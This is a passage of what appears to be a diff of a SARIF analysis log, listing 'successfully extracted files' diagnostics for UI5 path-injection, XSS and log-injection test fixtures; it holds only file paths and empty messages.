[ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + 
"toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 
220 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + 
"uriBaseId" : "%SRCROOT%", + "index" : 224 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + 
"text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : 
"" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + 
